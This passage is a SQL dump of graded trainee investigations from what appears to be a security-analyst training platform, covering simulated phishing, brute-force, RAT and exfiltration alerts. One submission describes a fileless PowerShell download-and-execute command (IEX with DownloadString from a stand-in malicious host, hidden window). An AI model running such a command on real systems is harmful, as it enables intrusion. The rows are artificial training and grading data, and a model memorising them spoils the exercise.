(532, 283, 243, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":\"There were 45 unsuccessful attempts to log in using the RDP protocol from the 192.168.1.25 host to the 10.0.0.4 server.\\nThe key indicator of the attack is the search for various accounts (admin, guest, user1), which is typical for automated brute force, and not for user error.\",\"artifacts\":\"192.168.1.25, 10.0.0.4, RDP, admin/guest/user1\",\"analysis_answers\":{\"action_taken\":\"There were 45 unsuccessful attempts to log in using the RDP protocol from the 192.168.1.25 host to the 10.0.0.4 server.\\nThe key indicator of the attack is the search for various accounts (admin, guest, user1), which is typical for automated brute force, and not for user error.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-12T13:23:14.060Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-12 16:20:28', '2026-03-12 13:11:28', '2026-03-12 13:24:00', 0, NULL),
(533, 290, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-12 13:52:27', '2026-03-12 13:52:27', 0, NULL),
(534, 290, 384, 'graded', 85, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.25\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"block_ip\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/12/2026, 8:08:24 AM\\nALERT: Spear Phishing Email Detected [OP: Operation Gothic Panda]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.25\\n- [EMAIL] john.doe@fakecompany.com\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (2)\\n------------------------------\\n- Block IP/Domain\\n- Block File Hash\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-12T15:08:59.097Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)\",\"missed_items\":[\"isolate_host\",\"collect_forensics\"],\"strengths\":\"Solid analysis\"}', '2026-03-12 17:31:23', '2026-03-12 14:25:23', '2026-03-12 15:08:59', 0, NULL),
(535, 290, 384, 'investigating', NULL, NULL, NULL, NULL, '2026-03-12 17:30:23', '2026-03-12 14:25:23', '2026-03-12 14:25:23', 0, NULL),
(536, 34, 234, 'investigating', NULL, NULL, NULL, NULL, '2026-03-12 17:48:47', '2026-03-12 14:38:47', '2026-03-12 14:38:47', 0, NULL),
(537, 287, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-12 16:02:59', '2026-03-12 16:02:59', 0, NULL),
(538, 34, 233, 'investigating', NULL, NULL, NULL, NULL, '2026-03-12 21:07:09', '2026-03-12 18:01:09', '2026-03-12 18:01:09', 0, NULL),
(539, 283, 1466, 'graded', 82, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/5)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.105\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"block_ip\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 12.03.2026, 23:08:49\\nALERT: Initial Access via Spear Phishing [OP: Operation Salt Typhoon]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.105\\n- [HASH] b1946ac92492d2347c6235b4d2611184\\n- [DOMAIN] update-portal.example.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (2)\\n------------------------------\\n- Block IP/Domain\\n- Block File Hash\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-12T20:09:56.045Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/5)\",\"missed_items\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"strengths\":\"Solid analysis\"}', '2026-03-12 23:10:18', '2026-03-12 20:02:18', '2026-03-12 20:09:56', 0, NULL),
(540, 283, 1467, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.15\",\"hash-d41d8cd9\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"block_ip\",\"block_hash\",\"isolate_host\",\"collect_forensics\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 12.03.2026, 23:15:00\\nALERT: Execution of Malicious Payload [OP: Operation Salt Typhoon]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.15\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] payload.exe\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-12T20:15:07.202Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-12 20:09:56', '2026-03-12 20:15:07', 0, NULL),
(541, 283, 1468, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.5\",\"hash-d41d8cd9\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 12.03.2026, 23:17:56\\nALERT: Persistence through Backdoor Installation [OP: Operation Salt Typhoon]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.5\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] backdoor_installer.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-12T20:17:58.561Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-12 20:15:07', '2026-03-12 20:17:58', 0, NULL),
(542, 283, 1469, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.0.5.12\",\"ip-192.168.1.50\",\"hash-d41d8cd9\",\"domain-CORP\",\"artifact_3\"],\"selectedActions\":[\"collect_forensics\",\"block_hash\",\"isolate_host\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 12.03.2026, 23:19:53\\nALERT: Lateral Movement to Wiretap Systems [OP: Operation Salt Typhoon]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 10.0.5.12\\n- [IP] 192.168.1.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [DOMAIN] CORP\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-12T20:19:56.149Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-12 20:17:58', '2026-03-12 20:19:56', 0, NULL),
(543, 283, 1470, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.10\",\"ip-203.0.113.45\",\"hash-5d41402a\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 12.03.2026, 23:20:52\\nALERT: Exfiltration of Sensitive Communications [OP: Operation Salt Typhoon]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.10\\n- [IP] 203.0.113.45\\n- [HASH] 5d41402abc4b2a76b9719d911017c592\\n- [FILENAME] wiretap_data.zip\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-12T20:20:53.053Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-12 20:19:56', '2026-03-12 20:20:53', 0, NULL),
(544, 283, 237, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":\"Activity characteristic of Fileless Malware (fileless virus) has been detected:\\nUsing the IEX(...).DownloadString() command to download and immediately execute a script from the Internet directly in RAM, without saving it to disk. Hidden launch with the -nop and -w hidden flags. Downloading code from a suspicious external resource (http://malicious.example.com/script.ps1 ).\\nThe parent process explorer.exe indicates that the attack started with a user action (for example, opening a phishing document).\",\"artifacts\":\"powershell.exe -c IEX(New-Object Net.WebClient)..., http://malicious.example.com/script.ps1, 192.0.2.123\",\"analysis_answers\":{\"action_taken\":\"Activity characteristic of Fileless Malware (fileless virus) has been detected:\\nUsing the IEX(...).DownloadString() command to download and immediately execute a script from the Internet directly in RAM, without saving it to disk. Hidden launch with the -nop and -w hidden flags. Downloading code from a suspicious external resource (http://malicious.example.com/script.ps1 ).\\nThe parent process explorer.exe indicates that the attack started with a user action (for example, opening a phishing document).\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-12T21:46:42.285Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-13 00:51:28', '2026-03-12 21:44:28', '2026-03-12 21:48:00', 0, NULL),
(545, 225, 237, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":\"The explorer.exe ran a powershell command to download malicious file from a malicious website.\",\"artifacts\":\"192.0.2.123, b1946ac92492d2347c6235b4d2611184, http://malicious.example.com/script.ps1\",\"analysis_answers\":{\"action_taken\":\"The explorer.exe ran a powershell command to download malicious file from a malicious website.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-13T02:58:27.960Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-13 06:01:00', '2026-03-13 02:53:00', '2026-03-13 03:00:00', 0, NULL),
(546, 225, 233, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":\"The email sender is suspicious and the url is using HTTP that uses port 80. HTTP is not secured and the credentials will show up not encrypted.\",\"artifacts\":\"198.51.100.22, http://secure-bank.com/login\",\"analysis_answers\":{\"action_taken\":\"The email sender is suspicious and the url is using HTTP that uses port 80. HTTP is not secured and the credentials will show up not encrypted.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-13T03:03:30.586Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-13 06:05:04', '2026-03-13 03:00:04', '2026-03-13 03:04:00', 0, NULL),
(547, 225, 234, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"False Positive\",\"executive_summary\":\"Both IPs are internal and the user running the process execution is an admin. No suspicious event indicates malicious intent.\",\"artifacts\":\"10.0.0.20, 10.0.0.25, admin_user, server-02\",\"analysis_answers\":{\"action_taken\":\"Both IPs are internal and the user running the process execution is an admin. No suspicious event indicates malicious intent.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-13T03:30:44.532Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-13 06:18:04', '2026-03-13 03:08:04', '2026-03-13 03:31:00', 0, NULL),
(548, 225, 235, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":\"The internal IP address is connecting to a suspicious external IP address. The hostname data-server connecting to IP address 203.0.113.100 is an unusual activity and this should be further investigated.\",\"artifacts\":\"192.168.1.10, 203.0.113.100\",\"analysis_answers\":{\"action_taken\":\"The internal IP address is connecting to a suspicious external IP address. The hostname data-server connecting to IP address 203.0.113.100 is an unusual activity and this should be further investigated.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-15T10:40:40.813Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-13 06:39:07', '2026-03-13 03:31:07', '2026-03-15 10:41:00', 0, NULL),
(549, 42, 237, 'investigating', NULL, NULL, NULL, NULL, '2026-03-13 13:17:59', '2026-03-13 10:09:59', '2026-03-13 10:09:59', 0, NULL),
(550, 248, 269, 'graded', 93, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.50\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/13/2026, 4:40:20 PM\\nALERT: BlackEnergy Malware Execution [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] invoice.doc\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-13T13:40:59.033Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)\",\"missed_items\":[\"collect_forensics\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-13 13:32:23', '2026-03-13 13:40:59', 0, NULL),
(551, 248, 270, 'graded', 90, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (4/6)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"hash-3fa85f64\",\"artifact_1\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 14/03/2026, 00:40:15\\nALERT: Persistence Mechanism Established [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [HASH] 3fa85f64-5717-4562-b3fc-2c963f66afa6\\n- [IP] 10.0.1.15\\n- [FILENAME] C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\\n- [USERNAME] compromised_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-13T21:40:22.436Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (4/6)\",\"missed_items\":[\"collect_forensics\",\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-13 13:40:59', '2026-03-13 21:40:22', 0, NULL),
(552, 232, 1443, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-172.217.18.110\",\"ip-10.0.0.15\",\"hash-d41d8cd9\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/13/2026, 9:52:19 PM\\nALERT: Initial Access via Spear Phishing [OP: Operation In(ter)ception]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 172.217.18.110\\n- [IP] 10.0.0.15\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [EMAIL] j.smith@aerospace-experts.com\\n- [URL] http://compromised-site.com/login\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-13T16:22:18.840Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-13 19:29:38', '2026-03-13 16:21:38', '2026-03-13 16:22:18', 0, NULL),
(553, 232, 1444, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.10\",\"hash-3fa8f88c\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/14/2026, 10:04:03 AM\\nALERT: Execution of Custom Mac Malware [OP: Operation In(ter)ception]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.10\\n- [HASH] 3fa8f88c9b1e237e9b6c8e1e4d9e2f7c\\n- [FILENAME] launchProxy\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-14T04:34:03.986Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-13 16:22:18', '2026-03-14 04:34:03', 0, NULL),
(554, 232, 1445, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-10.0.5.12\",\"ip-203.0.113.5\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/14/2026, 10:05:06 AM\\nALERT: Establishing Persistence and Lateral Movement [OP: Operation In(ter)ception]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 10.0.5.12\\n- [IP] 203.0.113.5\\n- [USERNAME] jdoe\\n- [HASH] 7e4d2b6e3f8c6b1b9a3c342f5d7a8a3b\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-14T04:35:08.173Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-14 04:34:04', '2026-03-14 04:35:08', 0, NULL),
(555, 297, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-14 16:38:17', '2026-03-14 16:38:17', 0, NULL),
(556, 232, 1366, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.10\",\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/14/2026, 10:11:24 PM\\nALERT: Suspicious LinkedIn Connection Request [OP: Operation Dream Job]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 192.168.1.10\\n- [EMAIL] john.doe@toptechtalent.com\\n- [IP] 203.0.113.45\\n- [URL] http://maliciouslink.com/joboffer\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-14T16:41:24.172Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-14 19:45:21', '2026-03-14 16:40:21', '2026-03-14 16:41:24', 0, NULL);
INSERT INTO `investigations` (`id`, `user_id`, `alert_id`, `status`, `grade`, `feedback`, `executive_summary`, `ai_summary`, `ai_evaluation_scheduled_at`, `created_at`, `updated_at`, `is_reported`, `report_reason`) VALUES
(557, 232, 1367, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_3\",\"artifact_2\",\"ip-203.0.113.45\",\"ip-192.168.1.25\"],\"selectedActions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/14/2026, 10:12:02 PM\\nALERT: Malicious Attachment in Follow-up Email [OP: Operation Dream Job]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 192.168.1.25\\n- [IP] 203.0.113.45\\n- [HASH] 7f5a8d7e5b9c4a6d9c3a7a8b5c6d4e5f\\n- [EMAIL] hr@fakesite.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-14T16:42:01.468Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-14 16:41:24', '2026-03-14 16:42:01', 0, NULL),
(558, 232, 1368, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.25\",\"hash-e99a18c4\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\",\"collect_forensics\",\"block_hash\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/14/2026, 10:12:31 PM\\nALERT: Establishment of Remote Access Trojan (RAT) [OP: Operation Dream Job]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.25\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [FILENAME] lazarus_rat.dll\\n- [USERNAME] victim_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-14T16:42:29.922Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-14 16:42:02', '2026-03-14 16:42:29', 0, NULL),
